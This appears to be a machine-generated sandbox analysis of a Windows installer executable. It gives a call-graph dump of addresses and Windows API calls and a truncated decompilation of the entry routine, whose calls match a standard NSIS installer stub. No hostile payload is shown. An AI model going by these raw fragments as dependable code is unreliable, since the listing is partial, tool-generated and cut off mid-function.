calls 4363->4364 4365 404399 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4364->4365 4366 401389 2 API calls 4365->4366 4367 4043df 4366->4367 4367->4362 4368 4043e7 ShowWindow 4367->4368 4369 4044c2 SendMessageW 4368->4369 4369->4370 4370->4327 4370->4362 4372 4044da 4371->4372 4373 4044cb SendMessageW 4371->4373 4372->4360 4373->4372 4375 406557 17 API calls 4374->4375 4376 404481 SetDlgItemTextW 4375->4376 4376->4344 4377->4348 4378->4353 4380 406557 17 API calls 4379->4380 4381 403f66 SetWindowTextW 4380->4381 4381->4353 4382->4355 4385 401390 4383->4385 4384 4013fe 4384->4360 4385->4384 4386 4013cb MulDiv SendMessageW 4385->4386 4386->4385 4388 401389 2 API calls 4387->4388 4389 401420 4388->4389 4389->4341 4391 404456 4390->4391 4392 40445c SendMessageW 4390->4392 4391->4392 4392->4338 4394 4044f5 GetWindowLongW 4393->4394 4395 4045a0 4393->4395 4394->4395 4396 40450a 4394->4396 4395->4362 4396->4395 4397 404537 GetSysColor 4396->4397 4398 40453a 4396->4398 4397->4398 4399 404540 SetTextColor 4398->4399 4400 40454a 
SetBkMode 4398->4400 4399->4400 4401 404562 GetSysColor 4400->4401 4402 404568 4400->4402 4401->4402 4403 404579 4402->4403 4404 40456f SetBkColor 4402->4404 4403->4395 4405 404593 CreateBrushIndirect 4403->4405 4406 40458c DeleteObject 4403->4406 4404->4403 4405->4395 4406->4405 5421 401b77 5422 402da6 17 API calls 5421->5422 5423 401b7e 5422->5423 5424 402d84 17 API calls 5423->5424 5425 401b87 wsprintfW 5424->5425 5426 402c2a 5425->5426 5427 734f1774 5428 734f17a3 5427->5428 5429 734f1bff 22 API calls 5428->5429 5430 734f17aa 5429->5430 5431 734f17bd 5430->5431 5432 734f17b1 5430->5432 5433 734f17c7 5431->5433 5434 734f17e4 5431->5434 5435 734f1312 2 API calls 5432->5435 5437 734f15dd 3 API calls 5433->5437 5438 734f180e 5434->5438 5439 734f17ea 5434->5439 5436 734f17bb 5435->5436 5441 734f17cc 5437->5441 5440 734f15dd 3 API calls 5438->5440 5442 734f1654 3 API calls 5439->5442 5440->5436 5443 734f1654 3 API calls 5441->5443 5444 734f17ef 5442->5444 5445 734f17d2 5443->5445 5446 734f1312 2 API calls 5444->5446 5447 734f1312 2 API calls 5445->5447 5448 734f17f5 GlobalFree 5446->5448 5449 734f17d8 GlobalFree 5447->5449 5448->5436 5450 734f1809 GlobalFree 5448->5450 5449->5436 5450->5436 5451 40167b 5452 402da6 17 API calls 5451->5452 5453 401682 5452->5453 5454 402da6 17 API calls 5453->5454 5455 40168b 5454->5455 5456 402da6 17 API calls 5455->5456 5457 401694 MoveFileW 5456->5457 5458 4016a0 5457->5458 5459 4016a7 5457->5459 5460 401423 24 API calls 5458->5460 5461 406850 2 API calls 5459->5461 5463 4022f6 5459->5463 5460->5463 5462 4016b6 5461->5462 5462->5463 5464 4062da 36 API calls 5462->5464 5464->5458 5465 4022ff 5466 402da6 17 API calls 5465->5466 5467 402305 5466->5467 5468 402da6 17 API calls 5467->5468 5469 40230e 5468->5469 5470 402da6 17 API calls 5469->5470 5471 402317 5470->5471 5472 406850 2 API calls 5471->5472 5473 402320 5472->5473 5474 402331 lstrlenW lstrlenW 5473->5474 5475 402324 5473->5475 5477 40557c 24 API calls 5474->5477 5476 40557c 24 
API calls 5475->5476 5478 40232c 5475->5478 5476->5478 5479 40236f SHFileOperationW 5477->5479 5479->5475 5479->5478 5480 4019ff 5481 402da6 17 API calls 5480->5481 5482 401a06 5481->5482 5483 402da6 17 API calls 5482->5483 5484 401a0f 5483->5484 5485 401a16 lstrcmpiW 5484->5485 5486 401a28 lstrcmpW 5484->5486 5487 401a1c 5485->5487 5486->5487 5488 401000 5489 401037 BeginPaint GetClientRect 5488->5489 5490 40100c DefWindowProcW 5488->5490 5492 4010f3 5489->5492 5495 401179 5490->5495 5493 401073 CreateBrushIndirect FillRect DeleteObject 5492->5493 5494 4010fc 5492->5494 5493->5492 5496 401102 CreateFontIndirectW 5494->5496 5497 401167 EndPaint 5494->5497 5496->5497 5498 401112 6 API calls 5496->5498 5497->5495 5498->5497 5499 401d81 5500 401d94 GetDlgItem 5499->5500 5501 401d87 5499->5501 5502 401d8e 5500->5502 5503 402d84 17 API calls 5501->5503 5504 401dd5 GetClientRect LoadImageW SendMessageW 5502->5504 5505 402da6 17 API calls 5502->5505 5503->5502 5507 401e33 5504->5507 5509 401e3f 5504->5509 5505->5504 5508 401e38 DeleteObject 5507->5508 5507->5509 5508->5509 5510 734f170d 5511 734f15b6 GlobalFree 5510->5511 5514 734f1725 5511->5514 5512 734f176b GlobalFree 5513 734f1740 5513->5512 5514->5512 5514->5513 5515 734f1757 VirtualFree 5514->5515 5515->5512 5516 401503 5517 40150b 5516->5517 5519 40151e 5516->5519 5518 402d84 17 API calls 5517->5518 5518->5519 5520 402383 5521 40238a 5520->5521 5524 40239d 5520->5524 5522 406557 17 API calls 5521->5522 5523 402397 5522->5523 5523->5524 5525 405b7a MessageBoxIndirectW 5523->5525 5525->5524 5526 402c05 SendMessageW 5527 402c2a 5526->5527 5528 402c1f InvalidateRect 5526->5528 5528->5527 5529 403b87 5530 403b92 5529->5530 5531 403b96 5530->5531 5532 403b99 GlobalAlloc 5530->5532 5532->5531 4601 40350a SetErrorMode GetVersionExW 4602 403594 4601->4602 4603 40355c GetVersionExW 4601->4603 4604 4035ed 4602->4604 4605 4068e7 5 API calls 4602->4605 4603->4602 4606 406877 3 API calls 4604->4606 4605->4604 4607 403603 
lstrlenA 4606->4607 4607->4604 4608 403613 4607->4608 4609 4068e7 5 API calls 4608->4609 4610 40361a 4609->4610 4611 4068e7 5 API calls 4610->4611 4612 403621 4611->4612 4613 4068e7 5 API calls 4612->4613 4614 40362d #17 OleInitialize SHGetFileInfoW 4613->4614 4692 40651a lstrcpynW 4614->4692 4617 40367a GetCommandLineW 4693 40651a lstrcpynW 4617->4693 4619 40368c 4620 405e16 CharNextW 4619->4620 4621 4036b2 CharNextW 4620->4621 4630 4036c3 4621->4630 4622 4037c1 4623 4037d5 GetTempPathW 4622->4623 4694 4034d9 4623->4694 4625 4037ed 4627 4037f1 GetWindowsDirectoryW lstrcatW 4625->4627 4628 403847 DeleteFileW 4625->4628 4626 405e16 CharNextW 4626->4630 4631 4034d9 12 API calls 4627->4631 4704 40307d GetTickCount GetModuleFileNameW 4628->4704 4630->4622 4630->4626 4636 4037c3 4630->4636 4633 40380d 4631->4633 4632 40385a 4634 40391e 4632->4634 4637 40390f 4632->4637 4642 405e16 CharNextW 4632->4642 4633->4628 4635 403811 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4633->4635 4796 403aef 4634->4796 4640 4034d9 12 API calls 4635->4640 4788 40651a lstrcpynW 4636->4788 4732 403bc9 4637->4732 4641 40383f 4640->4641 4641->4628 4641->4634 4657 40387c 4642->4657 4645 403a46 4803 405b7a 4645->4803 4646 403a5b 4647 403a63 GetCurrentProcess OpenProcessToken 4646->4647 4648 403ad9 ExitProcess 4646->4648 4650 403aa9 4647->4650 4651 403a7a LookupPrivilegeValueW AdjustTokenPrivileges 4647->4651 4656 4068e7 5 API calls 4650->4656 4651->4650 4653 4038e5 4659 405ef1 18 API calls 4653->4659 4654 403926 4658 405ae5 5 API calls 4654->4658 4661 403ab0 4656->4661 4657->4653 4657->4654 4662 40392b lstrcatW 4658->4662 4660 4038f1 4659->4660 4660->4634 4789 40651a lstrcpynW 4660->4789 4663 403ac5 ExitWindowsEx 4661->4663 4667 403ad2 4661->4667 4664 403947 lstrcatW lstrcmpiW 4662->4664 4665 40393c lstrcatW 4662->4665 4663->4648 4663->4667 4664->4634 4668 403967 4664->4668 4665->4664 4670 40140b 2 API calls 4667->4670 4671 403973 4668->4671 4672 40396c 4668->4672 4669 
403904 4790 40651a lstrcpynW 4669->4790 4670->4648 4674 405ac8 2 API calls 4671->4674 4673 405a4b 4 API calls 4672->4673 4676 403971 4673->4676 4677 403978 SetCurrentDirectoryW 4674->4677 4676->4677 4678 403995 4677->4678 4679 40398a 4677->4679 4792 40651a lstrcpynW 4678->4792 4791 40651a lstrcpynW 4679->4791 4682 406557 17 API calls 4683 4039d7 DeleteFileW 4682->4683 4684 4039e3 CopyFileW 4683->4684 4689 4039a2 4683->4689 4684->4689 4685 403a2d 4686 4062da 36 API calls 4685->4686 4686->4634 4687 4062da 36 API calls 4687->4689 4688 406557 17 API calls 4688->4689 4689->4682 4689->4685 4689->4687 4689->4688 4691 403a17 CloseHandle 4689->4691 4793 405afd CreateProcessW 4689->4793 4691->4689 4692->4617 4693->4619 4695 4067a1 5 API calls 4694->4695 4696 4034e5 4695->4696 4697 4034ef 4696->4697 4698 405de9 3 API calls 4696->4698 4697->4625 4699 4034f7 4698->4699 4700 405ac8 2 API calls 4699->4700 4701 4034fd 4700->4701 4807 406039 4701->4807 4811 40600a GetFileAttributesW CreateFileW 4704->4811 4706 4030bd 4731 4030cd 4706->4731 4812 40651a lstrcpynW 4706->4812 4708 4030e3 4709 405e35 2 API calls 4708->4709 4710 4030e9 4709->4710 4813 40651a lstrcpynW 4710->4813 4712 4030f4 GetFileSize 4727 4031ee 4712->4727 4730 40310b 4712->4730 4714 4031f7 4716 403227 GlobalAlloc 4714->4716 4714->4731 4849 4034c2 SetFilePointer 4714->4849 4825 4034c2 SetFilePointer 4716->4825 4718 40325a 4720 403019 6 API calls 4718->4720 4720->4731 4721 403210 4723 4034ac ReadFile 4721->4723 4722 403242 4826 4032b4 4722->4826 4725 40321b 4723->4725 4725->4716 4725->4731 4726 403019 6 API calls 4726->4730 4814 403019 4727->4814 4728 40324e 4728->4728 4729 40328b SetFilePointer 4728->4729 4728->4731 4729->4731 4730->4718 4730->4726 4730->4727 4730->4731 4846 4034ac 4730->4846 4731->4632 4733 4068e7 5 API calls 4732->4733 4734 403bdd 4733->4734 4735 403be3 4734->4735 4736 403bf5 4734->4736 4870 406461 wsprintfW 4735->4870 4737 4063e8 3 API calls 4736->4737 4738 403c25 4737->4738 4739 403c44 lstrcatW 
4738->4739 4741 4063e8 3 API calls 4738->4741 4742 403bf3 4739->4742 4741->4739 4855 403e9f 4742->4855 4745 405ef1 18 API calls 4746 403c76 4745->4746 4747 403d0a 4746->4747 4749 4063e8 3 API calls 4746->4749 4748 405ef1 18 API calls 4747->4748 4750 403d10 4748->4750 4751 403ca8 4749->4751 4752 403d20 LoadImageW 4750->4752 4753 406557 17 API calls 4750->4753 4751->4747 4759 403cc9 lstrlenW 4751->4759 4760 405e16 CharNextW 4751->4760 4754 403dc6 4752->4754 4755 403d47 RegisterClassW 4752->4755 4753->4752 4758 40140b 2 API calls 4754->4758 4756 403dd0 4755->4756 4757 403d7d SystemParametersInfoW CreateWindowExW 4755->4757 4756->4634 4757->4754 4763 403dcc 4758->4763 4761 403cd7 lstrcmpiW 4759->4761 4762 403cfd 4759->4762 4764 403cc6 4760->4764 4761->4762 4765 403ce7 GetFileAttributesW 4761->4765 4766 405de9 3 API calls 4762->4766 4763->4756 4768 403e9f 18 API calls 4763->4768 4764->4759 4767 403cf3 4765->4767 4769 403d03 4766->4769 4767->4762 4770 405e35 2 API calls 4767->4770 4771 403ddd 4768->4771 4871 40651a lstrcpynW 4769->4871 4770->4762 4773 403de9 ShowWindow 4771->4773 4774 403e6c 4771->4774 4776 406877 3 API calls 4773->4776 4863 40564f OleInitialize 4774->4863 4778 403e01 4776->4778 4777 403e72 4779 403e76 4777->4779 4780 403e8e 4777->4780 4781 403e0f GetClassInfoW 4778->4781 4785 406877 3 API calls 4778->4785 4779->4756 4787 40140b 2 API calls 4779->4787 4784 40140b 2 API calls 4780->4784 4782 403e23 GetClassInfoW RegisterClassW 4781->4782 4783 403e39 DialogBoxParamW 4781->4783 4782->4783 4786 40140b 2 API calls 4783->4786 4784->4756 4785->4781 4786->4756 4787->4756 4788->4623 4789->4669 4790->4637 4791->4678 4792->4689 4794 405b30 CloseHandle 4793->4794 4795 405b3c 4793->4795 4794->4795 4795->4689 4797 403b07 4796->4797 4798 403af9 CloseHandle 4796->4798 4873 403b34 4797->4873 4798->4797 4801 405c26 67 API calls 4802 403a3b OleUninitialize 4801->4802 4802->4645 4802->4646 4806 405b8f 4803->4806 4804 403a53 ExitProcess 4805 405ba3 MessageBoxIndirectW 
4805->4804 4806->4804 4806->4805 4808 406046 GetTickCount GetTempFileNameW 4807->4808 4809 403508 4808->4809 4810 40607c 4808->4810 4809->4625 4810->4808 4810->4809 4811->4706 4812->4708 4813->4712 4815 403022 4814->4815 4816 40303a 4814->4816 4819 403032 4815->4819 4820 40302b DestroyWindow 4815->4820 4817 403042 4816->4817 4818 40304a GetTickCount 4816->4818 4850 406923 4817->4850 4822 403058 CreateDialogParamW ShowWindow 4818->4822 4823 40307b 4818->4823 4819->4714 4820->4819 4822->4823 4823->4714 4825->4722 4827 4032cd 4826->4827 4828 4032fb 4827->4828 4854 4034c2 SetFilePointer 4827->4854 4830 4034ac ReadFile 4828->4830 4831 403306 4830->4831 4832 403445 4831->4832 4833 403318 GetTickCount 4831->4833 4835 40342f 4831->4835 4834 403487 4832->4834 4839 403449 4832->4839 4833->4835 4842 403344 4833->4842 4836 4034ac ReadFile 4834->4836 4835->4728 4836->4835 4837 4034ac ReadFile 4837->4842 4838 4034ac ReadFile 4838->4839 4839->4835 4839->4838 4840 4060bc WriteFile 4839->4840 4840->4839 4841 40339a GetTickCount 4841->4842 4842->4835 4842->4837 4842->4841 4843 4033bf MulDiv wsprintfW 4842->4843 4845 4060bc WriteFile 4842->4845 4844 40557c 24 API calls 4843->4844 4844->4842 4845->4842 4847 40608d ReadFile 4846->4847 4848 4034bf 4847->4848 4848->4730 4849->4721 4851 406940 PeekMessageW 4850->4851 4852 403048 4851->4852 4853 406936 DispatchMessageW 4851->4853 4852->4714 4853->4851 4854->4828 4856 403eb3 4855->4856 4872 406461 wsprintfW 4856->4872 4858 403f24 4859 403f58 18 API calls 4858->4859 4861 403f29 4859->4861 4860 403c54 4860->4745 4861->4860 4862 406557 17 API calls 4861->4862 4862->4861 4864 4044c2 SendMessageW 4863->4864 4866 405672 4864->4866 4865 4044c2 SendMessageW 4867 4056ab OleUninitialize 4865->4867 4868 401389 2 API calls 4866->4868 4869 405699 4866->4869 4867->4777 4868->4866 4869->4865 4870->4742 4871->4747 4872->4858 4874 403b42 4873->4874 4875 403b0c 4874->4875 4876 403b47 FreeLibrary GlobalFree 4874->4876 4875->4801 4876->4875 4876->4876 5533 
40248a 5534 402da6 17 API calls 5533->5534 5535 40249c 5534->5535 5536 402da6 17 API calls 5535->5536 5537 4024a6 5536->5537 5550 402e36 5537->5550 5540 402c2a 5541 4024de 5543 4024ea 5541->5543 5546 402d84 17 API calls 5541->5546 5542 402da6 17 API calls 5545 4024d4 lstrlenW 5542->5545 5544 402509 RegSetValueExW 5543->5544 5547 4032b4 31 API calls 5543->5547 5548 40251f RegCloseKey 5544->5548 5545->5541 5546->5543 5547->5544 5548->5540 5551 402e51 5550->5551 5554 4063b5 5551->5554 5555 4063c4 5554->5555 5556 4024b6 5555->5556 5557 4063cf RegCreateKeyExW 5555->5557 5556->5540 5556->5541 5556->5542 5557->5556 5558 40290b 5559 402da6 17 API calls 5558->5559 5560 402912 FindFirstFileW 5559->5560 5561 40293a 5560->5561 5564 402925 5560->5564 5562 402943 5561->5562 5566 406461 wsprintfW 5561->5566 5567 40651a lstrcpynW 5562->5567 5566->5562 5567->5564 5568 40190c 5569 401943 5568->5569 5570 402da6 17 API calls 5569->5570 5571 401948 5570->5571 5572 405c26 67 API calls 5571->5572 5573 401951 5572->5573 5574 734f1000 5577 734f101b 5574->5577 5578 734f15b6 GlobalFree 5577->5578 5579 734f1020 5578->5579 5580 734f1027 GlobalAlloc 5579->5580 5581 734f1024 5579->5581 5580->5581 5582 734f15dd 3 API calls 5581->5582 5583 734f1019 5582->5583 5584 40190f 5585 402da6 17 API calls 5584->5585 5586 401916 5585->5586 5587 405b7a MessageBoxIndirectW 5586->5587 5588 40191f 5587->5588 5589 401491 5590 40557c 24 API calls 5589->5590 5591 401498 5590->5591 5592 402891 5593 402898 5592->5593 5595 402ba9 5592->5595 5594 402d84 17 API calls 5593->5594 5596 40289f 5594->5596 5597 4028ae SetFilePointer 5596->5597 5597->5595 5598 4028be 5597->5598 5600 406461 wsprintfW 5598->5600 5600->5595 5601 401f12 5602 402da6 17 API calls 5601->5602 5603 401f18 5602->5603 5604 402da6 17 API calls 5603->5604 5605 401f21 5604->5605 5606 402da6 17 API calls 5605->5606 5607 401f2a 5606->5607 5608 402da6 17 API calls 5607->5608 5609 401f33 5608->5609 5610 401423 24 API calls 5609->5610 5611 401f3a 5610->5611 5618 
405b40 ShellExecuteExW 5611->5618 5613 401f82 5615 40292e 5613->5615 5619 406992 WaitForSingleObject 5613->5619 5616 401f9f CloseHandle 5616->5615 5618->5613 5620 4069ac 5619->5620 5621 4069be GetExitCodeProcess 5620->5621 5622 406923 2 API calls 5620->5622 5621->5616 5623 4069b3 WaitForSingleObject 5622->5623 5623->5620 5624 402f93 5625 402fa5 SetTimer 5624->5625 5626 402fbe 5624->5626 5625->5626 5627 403013 5626->5627 5628 402fd8 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5626->5628 5628->5627 5629 401d17 5630 402d84 17 API calls 5629->5630 5631 401d1d IsWindow 5630->5631 5632 401a20 5631->5632 4877 401b9b 4878 401bec 4877->4878 4883 401ba8 4877->4883 4880 401bf1 4878->4880 4881 401c16 GlobalAlloc 4878->4881 4879 401c31 4884 406557 17 API calls 4879->4884 4890 40239d 4879->4890 4880->4890 4898 40651a lstrcpynW 4880->4898 4882 406557 17 API calls 4881->4882 4882->4879 4883->4879 4885 401bbf 4883->4885 4886 402397 4884->4886 4896 40651a lstrcpynW 4885->4896 4886->4890 4892 405b7a MessageBoxIndirectW 4886->4892 4888 401c03 GlobalFree 4888->4890 4891 401bce 4897 40651a lstrcpynW 4891->4897 4892->4890 4894 401bdd 4899 40651a lstrcpynW 4894->4899 4896->4891 4897->4894 4898->4888 4899->4890 5633 40261c 5634 402da6 17 API calls 5633->5634 5635 402623 5634->5635 5638 40600a GetFileAttributesW CreateFileW 5635->5638 5637 40262f 5638->5637 5639 40149e 5640 4014ac PostQuitMessage 5639->5640 5641 40239d 5639->5641 5640->5641 5642 40259e 5652 402de6 5642->5652 5645 402d84 17 API calls 5646 4025b1 5645->5646 5647 4025d9 RegEnumValueW 5646->5647 5648 4025cd RegEnumKeyW 5646->5648 5650 40292e 5646->5650 5649 4025ee RegCloseKey 5647->5649 5648->5649 5649->5650 5653 402da6 17 API calls 5652->5653 5654 402dfd 5653->5654 5655 406387 RegOpenKeyExW 5654->5655 5656 4025a8 5655->5656 5656->5645 5657 404920 5658 404930 5657->5658 5659 404956 5657->5659 5660 404476 18 API calls 5658->5660 5661 4044dd 8 API calls 5659->5661 5663 40493d SetDlgItemTextW 5660->5663 5662 404962 5661->5662 
5663->5659 5664 4015a3 5665 402da6 17 API calls 5664->5665 5666 4015aa SetFileAttributesW 5665->5666 5667 4015bc 5666->5667 5668 401fa4 5669 402da6 17 API calls 5668->5669 5670 401faa 5669->5670 5671 40557c 24 API calls 5670->5671 5672 401fb4 5671->5672 5673 405afd 2 API calls 5672->5673 5674 401fba 5673->5674 5675 406992 5 API calls 5674->5675 5677 40292e 5674->5677 5680 401fdd CloseHandle 5674->5680 5678 401fcf 5675->5678 5678->5680 5681 406461 wsprintfW 5678->5681 5680->5677 5681->5680 5682 40202a 5683 402da6 17 API calls 5682->5683 5684 402031 5683->5684 5685 4068e7 5 API calls 5684->5685 5686 402040 5685->5686 5687 4020cc 5686->5687 5688 40205c GlobalAlloc 5686->5688 5688->5687 5689 402070 5688->5689 5690 4068e7 5 API calls 5689->5690 5691 402077 5690->5691 5692 4068e7 5 API calls 5691->5692 5693 402081 5692->5693 5693->5687 5697 406461 wsprintfW 5693->5697 5695 4020ba 5698 406461 wsprintfW 5695->5698 5697->5695 5698->5687 5699 40252a 5700 402de6 17 API calls 5699->5700 5701 402534 5700->5701 5702 402da6 17 API calls 5701->5702 5703 40253d 5702->5703 5704 402548 RegQueryValueExW 5703->5704 5707 40292e 5703->5707 5705 402568 5704->5705 5706 40256e RegCloseKey 5704->5706 5705->5706 5710 406461 wsprintfW 5705->5710 5706->5707 5710->5706 5711 4021aa 5712 402da6 17 API calls 5711->5712 5713 4021b1 5712->5713 5714 402da6 17 API calls 5713->5714 5715 4021bb 5714->5715 5716 402da6 17 API calls 5715->5716 5717 4021c5 5716->5717 5718 402da6 17 API calls 5717->5718 5719 4021cf 5718->5719 5720 402da6 17 API calls 5719->5720 5721 4021d9 5720->5721 5722 402218 CoCreateInstance 5721->5722 5723 402da6 17 API calls 5721->5723 5726 402237 5722->5726 5723->5722 5724 401423 24 API calls 5725 4022f6 5724->5725 5726->5724 5726->5725 5727 4045ac lstrcpynW lstrlenW 5728 401a30 5729 402da6 17 API calls 5728->5729 5730 401a39 ExpandEnvironmentStringsW 5729->5730 5731 401a4d 5730->5731 5733 401a60 5730->5733 5732 401a52 lstrcmpW 5731->5732 5731->5733 5732->5733 5739 734f103d 5740 
734f101b 5 API calls 5739->5740 5741 734f1056 5740->5741 5742 4023b2 5743 4023c0 5742->5743 5744 4023ba 5742->5744 5746 4023ce 5743->5746 5747 402da6 17 API calls 5743->5747 5745 402da6 17 API calls 5744->5745 5745->5743 5748 4023dc 5746->5748 5749 402da6 17 API calls 5746->5749 5747->5746 5750 402da6 17 API calls 5748->5750 5749->5748 5751 4023e5 WritePrivateProfileStringW 5750->5751 5752 402434 5753 402467 5752->5753 5754 40243c 5752->5754 5755 402da6 17 API calls 5753->5755 5756 402de6 17 API calls 5754->5756 5757 40246e 5755->5757 5758 402443 5756->5758 5763 402e64 5757->5763 5760 402da6 17 API calls 5758->5760 5762 40247b 5758->5762 5761 402454 RegDeleteValueW RegCloseKey 5760->5761 5761->5762 5764 402e71 5763->5764 5765 402e78 5763->5765 5764->5762 5765->5764 5767 402ea9 5765->5767 5768 406387 RegOpenKeyExW 5767->5768 5769 402ed7 5768->5769 5770 402ee7 RegEnumValueW 5769->5770 5771 402f0a 5769->5771 5778 402f81 5769->5778 5770->5771 5772 402f71 RegCloseKey 5770->5772 5771->5772 5773 402f46 RegEnumKeyW 5771->5773 5774 402f4f RegCloseKey 5771->5774 5777 402ea9 6 API calls 5771->5777 5772->5778 5773->5771 5773->5774 5775 4068e7 5 API calls 5774->5775 5776 402f5f 5775->5776 5776->5778 5779 402f63 RegDeleteKeyW 5776->5779 5777->5771 5778->5764 5779->5778 5780 404635 5781 40464d 5780->5781 5788 404767 5780->5788 5785 404476 18 API calls 5781->5785 5782 4047d1 5783 40489b 5782->5783 5784 4047db GetDlgItem 5782->5784 5791 4044dd 8 API calls 5783->5791 5786 4047f5 5784->5786 5787 40485c 5784->5787 5790 4046b4 5785->5790 5786->5787 5795 40481b SendMessageW LoadCursorW SetCursor 5786->5795 5787->5783 5796 40486e 5787->5796 5788->5782 5788->5783 5789 4047a2 GetDlgItem SendMessageW 5788->5789 5813 404498 KiUserCallbackDispatcher 5789->5813 5793 404476 18 API calls 5790->5793 5794 404896 5791->5794 5798 4046c1 CheckDlgButton 5793->5798 5814 4048e4 5795->5814 5800 404884 5796->5800 5801 404874 SendMessageW 5796->5801 5797 4047cc 5803 4048c0 SendMessageW 5797->5803 5811 
404498 KiUserCallbackDispatcher 5798->5811 5800->5794 5802 40488a SendMessageW 5800->5802 5801->5800 5802->5794 5803->5782 5806 4046df GetDlgItem 5812 4044ab SendMessageW 5806->5812 5808 4046f5 SendMessageW 5809 404712 GetSysColor 5808->5809 5810 40471b SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5808->5810 5809->5810 5810->5794 5811->5806 5812->5808 5813->5797 5817 405b40 ShellExecuteExW 5814->5817 5816 40484a LoadCursorW SetCursor 5816->5787 5817->5816 5818 401735 5819 402da6 17 API calls 5818->5819 5820 40173c SearchPathW 5819->5820 5821 401757 5820->5821 5822 4014b8 5823 4014be 5822->5823 5824 401389 2 API calls 5823->5824 5825 4014c6 5824->5825 5826 401d38 5827 402d84 17 API calls 5826->5827 5828 401d3f 5827->5828 5829 402d84 17 API calls 5828->5829 5830 401d4b GetDlgItem 5829->5830 5831 402638 5830->5831 4900 4056bb 4901 405865 4900->4901 4902 4056dc GetDlgItem GetDlgItem GetDlgItem 4900->4902 4904 405896 4901->4904 4905 40586e GetDlgItem CreateThread CloseHandle 4901->4905 4946 4044ab SendMessageW 4902->4946 4907 4058c1 4904->4907 4908 4058e6 4904->4908 4909 4058ad ShowWindow ShowWindow 4904->4909 4905->4904 4949 40564f 5 API calls 4905->4949 4906 40574c 4916 405753 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4906->4916 4910 405921 4907->4910 4911 4058cd 4907->4911 4915 4044dd 8 API calls 4908->4915 4948 4044ab SendMessageW 4909->4948 4910->4908 4917 40592f SendMessageW 4910->4917 4913 4058d5 4911->4913 4914 4058fb ShowWindow 4911->4914 4918 40444f SendMessageW 4913->4918 4919 40591b 4914->4919 4920 40590d 4914->4920 4923 4058f4 4915->4923 4921 4057c1 4916->4921 4922 4057a5 SendMessageW SendMessageW 4916->4922 4917->4923 4924 405948 CreatePopupMenu 4917->4924 4918->4908 4928 40444f SendMessageW 4919->4928 4927 40557c 24 API calls 4920->4927 4925 4057d4 4921->4925 4926 4057c6 SendMessageW 4921->4926 4922->4921 4929 406557 17 API calls 4924->4929 4930 404476 18 API calls 4925->4930 4926->4925 4927->4919 4928->4910 4931 405958 
AppendMenuW 4929->4931 4932 4057e4 4930->4932 4933 405975 GetWindowRect 4931->4933 4934 405988 TrackPopupMenu 4931->4934 4935 405821 GetDlgItem SendMessageW 4932->4935 4936 4057ed ShowWindow 4932->4936 4933->4934 4934->4923 4937 4059a3 4934->4937 4935->4923 4940 405848 SendMessageW SendMessageW 4935->4940 4938 405810 4936->4938 4939 405803 ShowWindow 4936->4939 4941 4059bf SendMessageW 4937->4941 4947 4044ab SendMessageW 4938->4947 4939->4938 4940->4923 4941->4941 4942 4059dc OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4941->4942 4944 405a01 SendMessageW 4942->4944 4944->4944 4945 405a2a GlobalUnlock SetClipboardData CloseClipboard 4944->4945 4945->4923 4946->4906 4947->4935 4948->4907 5832 404cbd 5833 404ce9 5832->5833 5834 404ccd 5832->5834 5836 404d1c 5833->5836 5837 404cef SHGetPathFromIDListW 5833->5837 5843 405b5e GetDlgItemTextW 5834->5843 5839 404d06 SendMessageW 5837->5839 5840 404cff 5837->5840 5838 404cda SendMessageW 5838->5833 5839->5836 5841 40140b 2 API calls 5840->5841 5841->5839 5843->5838 5844 40263e 5845 402652 5844->5845 5846 40266d 5844->5846 5847 402d84 17 API calls 5845->5847 5848 402672 5846->5848 5849 40269d 5846->5849 5858 402659 5847->5858 5850 402da6 17 API calls 5848->5850 5851 402da6 17 API calls 5849->5851 5853 402679 5850->5853 5852 4026a4 lstrlenW 5851->5852 5852->5858 5861 40653c WideCharToMultiByte 5853->5861 5855 40268d lstrlenA 5855->5858 5856 4026e7 5857 4026d1 5857->5856 5859 4060bc WriteFile 5857->5859 5858->5856 5858->5857 5860 4060eb 5 API calls 5858->5860 5859->5856 5860->5857 5861->5855

                    Control-flow Graph (rendered graph omitted; legend: Executed / Not Executed)
                    C-Code - Quality: 79%
                    			_entry_() {
                    				WCHAR* _v8;
                    				signed int _v12;
                    				void* _v16;
                    				signed int _v20;
                    				int _v24;
                    				int _v28;
                    				struct _TOKEN_PRIVILEGES _v40;
                    				signed char _v42;
                    				int _v44;
                    				signed int _v48;
                    				intOrPtr _v278;
                    				signed short _v310;
                    				struct _OSVERSIONINFOW _v324;
                    				struct _SHFILEINFOW _v1016;
                    				intOrPtr* _t88;
                    				intOrPtr* _t94;
                    				void _t97;
                    				void* _t116;
                    				WCHAR* _t118;
                    				signed int _t120;
                    				intOrPtr* _t124;
                    				void* _t138;
                    				void* _t144;
                    				void* _t149;
                    				void* _t153;
                    				void* _t158;
                    				signed int _t168;
                    				void* _t171;
                    				void* _t176;
                    				intOrPtr _t178;
                    				intOrPtr _t179;
                    				intOrPtr* _t180;
                    				int _t189;
                    				void* _t190;
                    				void* _t199;
                    				signed int _t205;
                    				signed int _t210;
                    				signed int _t215;
                    				int* _t219;
                    				signed int _t227;
                    				signed int _t230;
                    				CHAR* _t232;
                    				signed int _t234;
                    				WCHAR* _t235;
                    
                    				0x7b3000 = 0x20;
                    				_t189 = 0;
                    				_v24 = 0;
                    				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                    				_v20 = 0;
                    				SetErrorMode(0x8001); // executed
                    				_v324.szCSDVersion = 0;
                    				_v48 = 0;
                    				_v44 = 0;
                    				_v324.dwOSVersionInfoSize = 0x11c;
                    				if(GetVersionExW( &_v324) == 0) {
                    					_v324.dwOSVersionInfoSize = 0x114;
                    					GetVersionExW( &_v324);
                    					asm("sbb eax, eax");
                    					_v42 = 4;
                    					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                    				}
                    				if(_v324.dwMajorVersion < 0xa) {
                    					_v310 = _v310 & 0x00000000;
                    				}
                    				 *0x7a8b18 = _v324.dwBuildNumber;
                    				 *0x7a8b1c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                    				if( *0x7a8b1e != 0x600) {
                    					_t180 = E004068E7(_t189);
                    					if(_t180 != _t189) {
                    						 *_t180(0xc00);
                    					}
                    				}
